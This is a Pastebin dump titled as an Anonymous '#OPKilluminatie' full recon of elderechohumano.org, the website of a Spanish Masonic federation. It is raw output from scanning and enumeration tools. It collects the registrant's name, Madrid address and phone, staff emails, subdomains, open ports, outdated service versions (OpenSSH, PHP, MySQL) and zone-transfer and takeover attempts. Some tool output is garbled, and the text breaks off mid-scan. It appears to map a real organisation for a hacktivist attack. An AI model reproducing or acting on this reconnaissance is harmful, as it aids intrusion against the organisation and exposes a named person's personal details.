Advertisement
Guest User

Anonymous #OPKilluminatie JTSEC Full Recon #3 2018

a guest
May 23rd, 2018
2,771
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 99.55 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname elderechohumano.org ISP OVH SAS
  3. Continent Europe Flag
  4. FR
  5. Country France Country Code FR
  6. Region Unknown Local time 23 May 2018 08:02 CEST
  7. City Unknown Postal Code Unknown
  8. IP Address 51.255.33.229 Latitude 48.858
  9. Longitude 2.339
  10. #######################################################################################################################################
  11. HostIP:51.255.33.229
  12. HostName:elderechohumano.org
  13.  
  14. Gathered Inet-whois information for 51.255.33.229
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 51.254.0.0 - 51.255.255.255
  19. netname: FR-OVH-20150522
  20. descr: OVH SAS
  21. country: FR
  22. admin-c: OTC2-RIPE
  23. tech-c: OTC2-RIPE
  24. status: LEGACY
  25. mnt-by: OVH-MNT
  26. created: 2015-05-26T08:55:56Z
  27. last-modified: 2015-05-27T15:52:47Z
  28. source: RIPE
  29. org: ORG-OS3-RIPE
  30.  
  31. organisation: ORG-OS3-RIPE
  32. org-name: OVH SAS
  33. org-type: LIR
  34. address: 2 rue Kellermann
  35. address: 59100
  36. address: Roubaix
  37. address: FRANCE
  38. phone: +33972101007
  39. abuse-c: AR15333-RIPE
  40. admin-c: OTC2-RIPE
  41. admin-c: OK217-RIPE
  42. admin-c: GM84-RIPE
  43. mnt-ref: OVH-MNT
  44. mnt-ref: RIPE-NCC-HM-MNT
  45. mnt-by: RIPE-NCC-HM-MNT
  46. mnt-by: OVH-MNT
  47. created: 2004-04-17T11:23:17Z
  48. last-modified: 2017-10-30T14:40:06Z
  49. source: RIPE # Filtered
  50.  
  51. role: OVH Technical Contact
  52. address: OVH SAS
  53. address: 2 rue Kellermann
  54. address: 59100 Roubaix
  55. address: France
  56. admin-c: OK217-RIPE
  57. tech-c: GM84-RIPE
  58. tech-c: SL10162-RIPE
  59. nic-hdl: OTC2-RIPE
  60. abuse-mailbox: abuse@ovh.net
  61. mnt-by: OVH-MNT
  62. created: 2004-01-28T17:42:29Z
  63. last-modified: 2014-09-05T10:47:15Z
  64. source: RIPE # Filtered
  65.  
  66. % Information related to '51.254.0.0/15AS16276'
  67.  
  68. route: 51.254.0.0/15
  69. descr: OVH
  70. origin: AS16276
  71. mnt-by: OVH-MNT
  72. created: 2015-05-28T17:50:05Z
  73. last-modified: 2015-05-28T17:50:05Z
  74. source: RIPE
  75.  
  76. % This query was served by the RIPE Database Query Service version 1.91.2 (ANGUS)
  77.  
  78.  
  79.  
  80. Gathered Inic-whois information for elderechohumano.org
  81. ---------------------------------------------------------------------------------------------------------------------------------------
  82. Domain Name: ELDERECHOHUMANO.ORG
  83. Registry Domain ID: D92744226-LROR
  84. Registrar WHOIS Server: whois.ovh.net
  85. Registrar URL: http://www.ovh.com
  86. Updated Date: 2017-12-02T16:33:10Z
  87. Creation Date: 2002-12-02T17:17:14Z
  88. Registry Expiry Date: 2018-12-02T17:17:14Z
  89. Registrar Registration Expiration Date:
  90. Registrar: OVH
  91. Registrar IANA ID: 433
  92. Registrar Abuse Contact Email: abuse@ovh.net
  93. Registrar Abuse Contact Phone: +33.972101007
  94. Reseller:
  95. Domain Status: clientDeleteProhibited https://ic�U@/epp#�-���cl�ientDe
  96. ����leU@tePro����hi�U@bited��������
  97. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  98. Registry Registrant ID: C199852471-LROR
  99. Registrant Name: Pedro-Jose Vila
  100. Registrant Organization: El Derecho Humano
  101. Registrant Street: c/Divino Valles, 3
  102. Registrant City: Madrid
  103. Registrant State/Province:
  104. Registrant Postal Code: 28045
  105. Registrant Country: ES
  106. Registrant Phone: +34.665804522
  107. Registrant Phone Ext:
  108. Registrant Fax:
  109. Registrant Fax Ext:
  110. Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.i�U@nfo
  111. Registry Admin ID: C199852472-LROR
  112. Admin Name: Pedro-Jose Vila
  113. Admin Organization:
  114. Admin Street: office #7888781
  115. Admin Street: c/o OwO, BP80157
  116. Admin City: Roubaix Cedex 1
  117. Admin State/Province:
  118. Admin Postal Code: 59053
  119. Admin Country: FR
  120. Admin Phone: +33.972101007
  121. Admin Phone Ext:
  122. Admin Fax:
  123. Admin Fax Ext:
  124. Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  125. Registry Tech ID: C199852472-LROR
  126. Tech Name: Pedro-Jose Vila
  127. Tech Organization:
  128. Tech Street: office #7888781
  129. Tech Street: c/o OwO, BP80157
  130. Tech City: Roubaix Cedex 1
  131. Tech State/Province:
  132. Tech Postal Code: 59053
  133. Tech Country: FR
  134. Tech Phone: +33.972101007
  135. Tech Phone Ext:
  136. Tech Fax:
  137. Tech Fax Ext:
  138. Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  139. Name Server: SDNS2.OVH.NET
  140. Name Server: VPS435959.OVH.NET
  141. DNSSEC: unsigned
  142. #######################################################################################################################################
  143. [i] Scanning Site: http://elderechohumano.org
  144.  
  145.  
  146.  
  147. B A S I C I N F O
  148. =======================================================================================================================================
  149.  
  150.  
  151. [+] Site Title: Federación española le droit humain el derecho humano – Logias españolas de la orden masónica mixta internacional
  152. [+] IP address: 51.255.33.229
  153. [+] Web Server: nginx
  154. [+] CMS: WordPress
  155. [+] Cloudflare: Not Detected
  156. [+] Robots File: Could NOT Find robots.txt!
  157.  
  158.  
  159.  
  160.  
  161. W H O I S L O O K U P
  162. =======================================================================================================================================
  163.  
  164. Domain Name: ELDERECHOHUMANO.ORG
  165. Registry Domain ID: D92744226-LROR
  166. Registrar WHOIS Server: whois.ovh.net
  167. Registrar URL: http://www.ovh.com
  168. Updated Date: 2017-12-02T16:33:10Z
  169. Creation Date: 2002-12-02T17:17:14Z
  170. Registry Expiry Date: 2018-12-02T17:17:14Z
  171. Registrar Registration Expiration Date:
  172. Registrar: OVH
  173. Registrar IANA ID: 433
  174. Registrar Abuse Contact Email: abuse@ovh.net
  175. Registrar Abuse Contact Phone: +33.972101007
  176. Reseller:
  177. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  178. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  179. Registry Registrant ID: C199852471-LROR
  180. Registrant Name: Pedro-Jose Vila
  181. Registrant Organization: El Derecho Humano
  182. Registrant Street: c/Divino Valles, 3
  183. Registrant City: Madrid
  184. Registrant State/Province:
  185. Registrant Postal Code: 28045
  186. Registrant Country: ES
  187. Registrant Phone: +34.665804522
  188. Registrant Phone Ext:
  189. Registrant Fax:
  190. Registrant Fax Ext:
  191. Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.info
  192. Registry Admin ID: C199852472-LROR
  193. Admin Name: Pedro-Jose Vila
  194. Admin Organization:
  195. Admin Street: office #7888781
  196. Admin Street: c/o OwO, BP80157
  197. Admin City: Roubaix Cedex 1
  198. Admin State/Province:
  199. Admin Postal Code: 59053
  200. Admin Country: FR
  201. Admin Phone: +33.972101007
  202. Admin Phone Ext:
  203. Admin Fax:
  204. Admin Fax Ext:
  205. Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  206. Registry Tech ID: C199852472-LROR
  207. Tech Name: Pedro-Jose Vila
  208. Tech Organization:
  209. Tech Street: office #7888781
  210. Tech Street: c/o OwO, BP80157
  211. Tech City: Roubaix Cedex 1
  212. Tech State/Province:
  213. Tech Postal Code: 59053
  214. Tech Country: FR
  215. Tech Phone: +33.972101007
  216. Tech Phone Ext:
  217. Tech Fax:
  218. Tech Fax Ext:
  219. Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  220. Name Server: SDNS2.OVH.NET
  221. Name Server: VPS435959.OVH.NET
  222. DNSSEC: unsigned
  223. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  224. >>> Last update of WHOIS database: 2018-05-23T06:05:09Z <<<
  225.  
  226. For more information on Whois status codes, please visit https://icann.org/epp
  227.  
  228.  
  229.  
  230.  
  231.  
  232. G E O I P L O O K U P
  233. =======================================================================================================================================
  234.  
  235. [i] IP Address: 51.255.33.229
  236. [i] Country: FR
  237. [i] State: N/A
  238. [i] City: N/A
  239. [i] Latitude: 48.858200
  240. [i] Longitude: 2.338700
  241.  
  242.  
  243.  
  244.  
  245. H T T P H E A D E R S
  246. =======================================================================================================================================
  247.  
  248.  
  249. [i] HTTP/1.1 301 Moved Permanently
  250. [i] Server: nginx
  251. [i] Date: Wed, 23 May 2018 06:06:13 GMT
  252. [i] Content-Type: text/html
  253. [i] Content-Length: 178
  254. [i] Connection: close
  255. [i] Location: https://elderechohumano.org/
  256. [i] HTTP/1.1 302 Found
  257. [i] Server: nginx
  258. [i] Date: Wed, 23 May 2018 06:06:15 GMT
  259. [i] Content-Type: text/html; charset=iso-8859-1
  260. [i] Content-Length: 285
  261. [i] Connection: close
  262. [i] Location: https://elderechohumano.org/web
  263. [i] X-Powered-By: PleskLin
  264. [i] HTTP/1.1 301 Moved Permanently
  265. [i] Server: nginx
  266. [i] Date: Wed, 23 May 2018 06:06:17 GMT
  267. [i] Content-Type: text/html; charset=iso-8859-1
  268. [i] Content-Length: 310
  269. [i] Connection: close
  270. [i] Location: https://elderechohumano.org/web/
  271. [i] X-Powered-By: PleskLin
  272. [i] HTTP/1.1 200 OK
  273. [i] Server: nginx
  274. [i] Date: Wed, 23 May 2018 06:06:20 GMT
  275. [i] Content-Type: text/html; charset=UTF-8
  276. [i] Connection: close
  277. [i] X-Powered-By: PHP/5.6.31
  278. [i] X-Pingback: https://elderechohumano.org/web/xmlrpc.php
  279. [i] Link: <https://elderechohumano.org/web/wp-json/>; rel="https://api.w.org/", <https://wp.me/P4jvyk-a>; rel=shortlink
  280. [i] Vary: Accept-Encoding
  281. [i] X-Powered-By: PleskLin
  282.  
  283.  
  284.  
  285.  
  286. D N S L O O K U P
  287. =======================================================================================================================================
  288.  
  289. ;; Truncated, retrying in TCP mode.
  290. elderechohumano.org. 43200 IN MX 10 mail.elderechohumano.org.
  291. elderechohumano.org. 43200 IN A 51.255.33.229
  292. elderechohumano.org. 43200 IN NS vps435959.ovh.net.
  293. elderechohumano.org. 43200 IN NS sdns2.ovh.net.
  294. elderechohumano.org. 43200 IN TXT "v=spf1 +a +mx -all"
  295. elderechohumano.org. 43200 IN SOA sdns2.ovh.net. webmaster.elderechohumano.org. 2018051502 10800 3600 604800 10800
  296.  
  297.  
  298.  
  299.  
  300. S U B N E T C A L C U L A T I O N
  301. =======================================================================================================================================
  302.  
  303. Address = 51.255.33.229
  304. Network = 51.255.33.229 / 32
  305. Netmask = 255.255.255.255
  306. Broadcast = not needed on Point-to-Point links
  307. Wildcard Mask = 0.0.0.0
  308. Hosts Bits = 0
  309. Max. Hosts = 1 (2^0 - 0)
  310. Host Range = { 51.255.33.229 - 51.255.33.229 }
  311.  
  312.  
  313.  
  314. N M A P P O R T S C A N
  315. =======================================================================================================================================
  316.  
  317.  
  318. Starting Nmap 7.01 ( https://nmap.org ) at 2018-05-23 06:06 UTC
  319. Nmap scan report for elderechohumano.org (51.255.33.229)
  320. Host is up (0.082s latency).
  321. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  322. PORT STATE SERVICE VERSION
  323. 21/tcp open ftp ProFTPD
  324. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
  325. 23/tcp closed telnet
  326. 25/tcp open smtp Postfix smtpd
  327. 80/tcp open http nginx
  328. 110/tcp open pop3 Courier pop3d
  329. 143/tcp open imap Courier Imapd (released 2015)
  330. 443/tcp open ssl/http nginx
  331. 445/tcp filtered microsoft-ds
  332. 3389/tcp closed ms-wbt-server
  333. Service Info: Hosts: 51.255.33.229, vps435959.ovh.net, localhost.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  334.  
  335. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  336. Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds
  337.  
  338. #######################################################################################################################################
  339. [!] IP Address : 51.255.33.229
  340. [!] Server: nginx
  341. [!] Powered By: PHP/5.6.31, PleskLin
  342. [+] Clickjacking protection is not in place.
  343. [+] Operating System : Ubuntu&#34;
  344. [!] elderechohumano.org doesn't seem to use a CMS
  345. [+] Honeypot Probabilty: 30%
  346. ---------------------------------------------------------------------------------------------------------------------------------------
  347. [~] Trying to gather whois information for elderechohumano.org
  348. [+] Whois information found
  349. [-] Unable to build response, visit https://who.is/whois/elderechohumano.org
  350. ---------------------------------------------------------------------------------------------------------------------------------------
  351. PORT STATE SERVICE VERSION
  352. 21/tcp open ftp ProFTPD
  353. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
  354. 23/tcp closed telnet
  355. 25/tcp open smtp Postfix smtpd
  356. 80/tcp open http nginx
  357. 110/tcp open pop3 Courier pop3d
  358. 143/tcp open imap Courier Imapd (released 2015)
  359. 443/tcp open ssl/http nginx
  360. 445/tcp filtered microsoft-ds
  361. 3389/tcp closed ms-wbt-server
  362. ---------------------------------------------------------------------------------------------------------------------------------------
  363.  
  364. [+] DNS Records
  365. sdns2.ovh.net. (213.251.188.141) AS16276 OVH SAS France
  366. vps435959.ovh.net. (51.255.33.229) AS16276 OVH SAS France
  367.  
  368. [+] MX Records
  369. 10 (51.255.33.229) AS16276 OVH SAS France
  370.  
  371. [+] Host Records (A)
  372. mail.elderechohumano.orgHTTP: (229.ip-51-255-33.eu) (51.255.33.229) AS16276 OVH SAS France
  373.  
  374. [+] TXT Records
  375. "v=spf1 +a +mx -all"
  376.  
  377. [+] DNS Map: https://dnsdumpster.com/static/map/elderechohumano.org.png
  378.  
  379. [>] Initiating 3 intel modules
  380. [>] Loading Alpha module (1/3)
  381. [>] Beta module deployed (2/3)
  382. [>] Gamma module initiated (3/3)
  383.  
  384.  
  385. [+] Emails found:
  386. ---------------------------------------------------------------------------------------------------------------------------------------
  387. gran.secretaria@elderechohumano.org
  388. webmaster@elderechohumano.org
  389.  
  390. [+] Hosts found in search engines:
  391. ---------------------------------------------------------------------------------------------------------------------------------------
  392. [-] Resolving hostnames IPs...
  393. 51.255.33.229:webmail.elderechohumano.org
  394. 51.255.33.229:www.elderechohumano.org
  395. [+] Virtual hosts:
  396. ---------------------------------------------------------------------------------------------------------------------------------------
  397. #######################################################################################################################################
  398. Server: 10.211.254.254
  399. Address: 10.211.254.254#53
  400.  
  401. Non-authoritative answer:
  402. Name: elderechohumano.org
  403. Address: 51.255.33.229
  404.  
  405. elderechohumano.org has address 51.255.33.229
  406. elderechohumano.org mail is handled by 10 mail.elderechohumano.org.
  407. #######################################################################################################################################
  408.  
  409. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  410.  
  411. [+] Target is elderechohumano.org
  412. [+] Loading modules.
  413. [+] Following modules are loaded:
  414. [x] [1] ping:icmp_ping - ICMP echo discovery module
  415. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  416. [x] [3] ping:udp_ping - UDP-based ping discovery module
  417. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  418. [x] [5] infogather:portscan - TCP and UDP PortScanner
  419. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  420. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  421. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  422. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  423. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  424. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  425. [x] [12] fingerprint:smb - SMB fingerprinting module
  426. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  427. [+] 13 modules registered
  428. [+] Initializing scan engine
  429. [+] Running scan engine
  430. [-] ping:tcp_ping module: no closed/open TCP ports known on 51.255.33.229. Module test failed
  431. [-] ping:udp_ping module: no closed/open UDP ports known on 51.255.33.229. Module test failed
  432. [-] No distance calculation. 51.255.33.229 appears to be dead or no ports known
  433. [+] Host: 51.255.33.229 is up (Guess probability: 50%)
  434. [+] Target: 51.255.33.229 is alive. Round-Trip Time: 0.49170 sec
  435. [+] Selected safe Round-Trip Time value is: 0.98339 sec
  436. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  437. [-] fingerprint:smb need either TCP port 139 or 445 to run
  438. [+] Primary guess:
  439. [+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
  440. [+] Other guesses:
  441. [+] Host 51.255.33.229 Running OS: 0
  442. V��U (Guess probability: 100%)
  443. [+] Host 51.255.33.229 Running OS: 0
  444. V��U (Guess probability: 100%)
  445. [+] Host 51.255.33.229 Running OS: 0
  446. V��U (Guess probability: 100%)
  447. [+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
  448. [+] Host 51.255.33.229 Running OS: 0
  449. V��U (Guess probability: 100%)
  450. [+] Host 51.255.33.229 Running OS: гT��U (Guess probability: 100%)
  451. [+] Host 51.255.33.229 Running OS: 0
  452. V��U (Guess probability: 100%)
  453. [+] Host 51.255.33.229 Running OS: 0
  454. V��U (Guess probability: 100%)
  455. [+] Host 51.255.33.229 Running OS: 0
  456. V��U (Guess probability: 100%)
  457. [+] Cleaning up scan engine
  458. [+] Modules deinitialized
  459. [+] Execution completed.
  460. #######################################################################################################################################
  461. Domain Name: ELDERECHOHUMANO.ORG
  462. Registry Domain ID: D92744226-LROR
  463. Registrar WHOIS Server: whois.ovh.net
  464. Registrar URL: http://www.ovh.com
  465. Updated Date: 2017-12-02T16:33:10Z
  466. Creation Date: 2002-12-02T17:17:14Z
  467. Registry Expiry Date: 2018-12-02T17:17:14Z
  468. Registrar Registration Expiration Date:
  469. Registrar: OVH
  470. Registrar IANA ID: 433
  471. Registrar Abuse Contact Email: abuse@ovh.net
  472. Registrar Abuse Contact Phone: +33.972101007
  473. Reseller:
  474. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  475. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  476. Registry Registrant ID: C199852471-LROR
  477. Registrant Name: Pedro-Jose Vila
  478. Registrant Organization: El Derecho Humano
  479. Registrant Street: c/Divino Valles, 3
  480. Registrant City: Madrid
  481. Registrant State/Province:
  482. Registrant Postal Code: 28045
  483. Registrant Country: ES
  484. Registrant Phone: +34.665804522
  485. Registrant Phone Ext:
  486. Registrant Fax:
  487. Registrant Fax Ext:
  488. Registrant Email: rlbsbwl67oxhhx3qmeof@y.o-w-o.info
  489. Registry Admin ID: C199852472-LROR
  490. Admin Name: Pedro-Jose Vila
  491. Admin Organization:
  492. Admin Street: office #7888781
  493. Admin Street: c/o OwO, BP80157
  494. Admin City: Roubaix Cedex 1
  495. Admin State/Province:
  496. Admin Postal Code: 59053
  497. Admin Country: FR
  498. Admin Phone: +33.972101007
  499. Admin Phone Ext:
  500. Admin Fax:
  501. Admin Fax Ext:
  502. Admin Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  503. Registry Tech ID: C199852472-LROR
  504. Tech Name: Pedro-Jose Vila
  505. Tech Organization:
  506. Tech Street: office #7888781
  507. Tech Street: c/o OwO, BP80157
  508. Tech City: Roubaix Cedex 1
  509. Tech State/Province:
  510. Tech Postal Code: 59053
  511. Tech Country: FR
  512. Tech Phone: +33.972101007
  513. Tech Phone Ext:
  514. Tech Fax:
  515. Tech Fax Ext:
  516. Tech Email: fufd3h4u5gs43cbcngc1@p.o-w-o.info
  517. Name Server: SDNS2.OVH.NET
  518. Name Server: VPS435959.OVH.NET
  519. DNSSEC: unsigned
  520. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  521. >>> Last update of WHOIS database: 2018-05-23T06:03:55Z <<<
  522.  
  523. For more information on Whois status codes, please visit https://icann.org/epp
  524.  
  525. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  526. #######################################################################################################################################
  527.  
  528. ; <<>> DiG 9.11.3-1-Debian <<>> -x elderechohumano.org
  529. ;; global options: +cmd
  530. ;; Got answer:
  531. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 8910
  532. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  533.  
  534. ;; OPT PSEUDOSECTION:
  535. ; EDNS: version: 0, flags:; udp: 512
  536. ;; QUESTION SECTION:
  537. ;org.elderechohumano.in-addr.arpa. IN PTR
  538.  
  539. ;; AUTHORITY SECTION:
  540. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013375 1800 900 604800 3600
  541.  
  542. ;; Query time: 228 msec
  543. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  544. ;; WHEN: Wed May 23 02:04:55 EDT 2018
  545. ;; MSG SIZE rcvd: 129
  546.  
  547. dnsenum VERSION:1.2.4
  548.  
  549. ----- elderechohumano.org -----
  550.  
  551.  
  552. Host's addresses:
  553. __________________
  554.  
  555. elderechohumano.org. 86176 IN A 51.255.33.229
  556.  
  557.  
  558. Name Servers:
  559. ______________
  560.  
  561. vps435959.ovh.net. 674 IN A 51.255.33.229
  562. sdns2.ovh.net. 689 IN A 213.251.188.141
  563.  
  564.  
  565. Mail (MX) Servers:
  566. ___________________
  567.  
  568. mail.elderechohumano.org. 86400 IN A 51.255.33.229
  569.  
  570.  
  571. Trying Zone Transfers and getting Bind Versions:
  572. _________________________________________________
  573.  
  574.  
  575. Trying Zone Transfer for elderechohumano.org on sdns2.ovh.net ...
  576.  
  577. Trying Zone Transfer for elderechohumano.org on vps435959.ovh.net ...
  578.  
  579. brute force file not specified, bay.
  580. #######################################################################################################################################
  581. [-] Enumerating subdomains now for elderechohumano.org
  582. [-] verbosity is enabled, will show the subdomains results in realtime
  583. [-] Searching now in Baidu..
  584. [-] Searching now in Yahoo..
  585. [-] Searching now in Google..
  586. [-] Searching now in Bing..
  587. [-] Searching now in Ask..
  588. [-] Searching now in Netcraft..
  589. [-] Searching now in DNSdumpster..
  590. [-] Searching now in Virustotal..
  591. [-] Searching now in ThreatCrowd..
  592. [-] Searching now in SSL Certificates..
  593. [-] Searching now in PassiveDNS..
  594. Virustotal: voces.elderechohumano.org
  595. Virustotal: www.elderechohumano.org
  596. Virustotal: mail.elderechohumano.org
  597. SSL Certificates: voces.elderechohumano.org
  598. SSL Certificates: www.elderechohumano.org
  599. [!] Error: Google probably now is blocking our requests
  600. [~] Finished now the Google Enumeration ...
  601. DNSdumpster: mail.elderechohumano.org
  602. [-] Saving results to file: /usr/share/sniper/loot/elderechohumano.org/domains/domains-elderechohumano.org.txt
  603. [-] Total Unique Subdomains Found: 3
  604. www.elderechohumano.org
  605. mail.elderechohumano.org
  606. voces.elderechohumano.org
  607. #######################################################################################################################################
  608. __
  609. ____ _____ ___ ______ _/ /_____ ____ ___
  610. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  611. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  612. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  613. /_/ discover v0.5.0 - by @michenriksen
  614.  
  615. Identifying nameservers for elderechohumano.org... Done
  616. Using nameservers:
  617.  
  618. - 51.255.33.229
  619. - 213.251.188.141
  620.  
  621. Checking for wildcard DNS... Done
  622.  
  623. Running collector: DNSDB... Done (2 hosts)
  624. Running collector: Netcraft... Done (0 hosts)
  625. Running collector: Dictionary... Done (26 hosts)
  626. Running collector: Wayback Machine... Done (6 hosts)
  627. Running collector: Shodan... Skipped
  628. -> Key 'shodan' has not been set
  629. Running collector: VirusTotal... Skipped
  630. -> Key 'virustotal' has not been set
  631. Running collector: PublicWWW... Done (0 hosts)
  632. Running collector: Censys... Skipped
  633. -> Key 'censys_secret' has not been set
  634. Running collector: Threat Crowd... Done (0 hosts)
  635. Running collector: Certificate Search... Done (2 hosts)
  636. Running collector: PTRArchive... Error
  637. -> PTRArchive returned unexpected response code: 502
  638. Running collector: Riddler... Skipped
  639. -> Key 'riddler_username' has not been set
  640. Running collector: PassiveTotal... Skipped
  641. -> Key 'passivetotal_key' has not been set
  642. Running collector: HackerTarget... Done (1 host)
  643. Running collector: Google Transparency Report... Done (0 hosts)
  644.  
  645. Resolving 33 unique hosts...
  646. 51.255.33.229 .elderechohumano.org
  647. 51.255.33.229 elderechohumano.org
  648. 51.255.33.229 ftp.elderechohumano.org
  649. 51.255.33.229 mail.elderechohumano.org
  650. 51.255.33.229 voces.elderechohumano.org
  651. 51.255.33.229 webmail.elderechohumano.org
  652. 51.255.33.229 www.elderechohumano.org
  653.  
  654. Found subnets:
  655.  
  656. - 51.255.33.0-255 : 7 hosts
  657.  
  658. Wrote 7 hosts to:
  659.  
  660. - file:///root/aquatone/elderechohumano.org/hosts.txt
  661. - file:///root/aquatone/elderechohumano.org/hosts.json
  662. __
  663. ____ _____ ___ ______ _/ /_____ ____ ___
  664. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  665. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  666. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  667. /_/ takeover v0.5.0 - by @michenriksen
  668.  
  669. Loaded 7 hosts from /root/aquatone/elderechohumano.org/hosts.json
  670. Loaded 25 domain takeover detectors
  671.  
  672. Identifying nameservers for elderechohumano.org... Done
  673. Using nameservers:
  674.  
  675. - 213.251.188.141
  676. - 51.255.33.229
  677.  
  678. Checking hosts for domain takeover vulnerabilities...
  679.  
  680. Finished checking hosts:
  681.  
  682. - Vulnerable : 0
  683. - Not Vulnerable : 7
  684.  
  685. Wrote 0 potential subdomain takeovers to:
  686.  
  687. - file:///root/aquatone/elderechohumano.org/takeovers.json
  688.  
  689. __
  690. ____ _____ ___ ______ _/ /_____ ____ ___
  691. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  692. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  693. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  694. /_/ scan v0.5.0 - by @michenriksen
  695.  
  696. Loaded 7 hosts from /root/aquatone/elderechohumano.org/hosts.json
  697.  
  698. Probing 2 ports...
  699. 443/tcp 51.255.33.229 webmail.elderechohumano.org, mail.elderechohumano.org, .elderechohumano.org and 4 more
  700. 80/tcp 51.255.33.229 ftp.elderechohumano.org, mail.elderechohumano.org, www.elderechohumano.org and 4 more
  701.  
  702. Wrote open ports to file:///root/aquatone/elderechohumano.org/open_ports.txt
  703. Wrote URLs to file:///root/aquatone/elderechohumano.org/urls.txt
  704. __
  705. ____ _____ ___ ______ _/ /_____ ____ ___
  706. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  707. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  708. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  709. /_/ gather v0.5.0 - by @michenriksen
  710.  
  711. Processing 14 pages...
  712.  
  713. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  714.  
  715. .elderechohumano.org : empty
  716. Webmail.elderechohumano.org : 51.255.33.229
  717. mail.elderechohumano.org : 51.255.33.229
  718. voces.elderechohumano.org : 51.255.33.229
  719. webmail.elderechohumano.org : 51.255.33.229
  720. www.elderechohumano.org : 51.255.33.229
  721.  
  722. [+] Virtual hosts:
  723. ------------------
  724. webmail.elderechohumano.org web.arena.ne.jp
  725.  
  726. #######################################################################################################################################
  727. PING elderechohumano.org (51.255.33.229) 56(84) bytes of data.
  728. 64 bytes from 229.ip-51-255-33.eu (51.255.33.229): icmp_seq=1 ttl=37 time=479 ms
  729.  
  730. --- elderechohumano.org ping statistics ---
  731. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  732. rtt min/avg/max/mdev = 479.315/479.315/479.315/0.000 ms
  733. #######################################################################################################################################
  734. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:09 EDT
  735. Warning: 51.255.33.229 giving up on port because retransmission cap hit (2).
  736. Nmap scan report for elderechohumano.org (51.255.33.229)
  737. Host is up (0.48s latency).
  738. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  739. Not shown: 457 closed ports, 6 filtered ports
  740. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  741. PORT STATE SERVICE
  742. 21/tcp open ftp
  743. 22/tcp open ssh
  744. 53/tcp open domain
  745. 80/tcp open http
  746. 110/tcp open pop3
  747. 143/tcp open imap
  748. 443/tcp open https
  749. 465/tcp open smtps
  750. 587/tcp open submission
  751. 993/tcp open imaps
  752. 995/tcp open pop3s
  753. 3306/tcp open mysql
  754. 7080/tcp open empowerid
  755.  
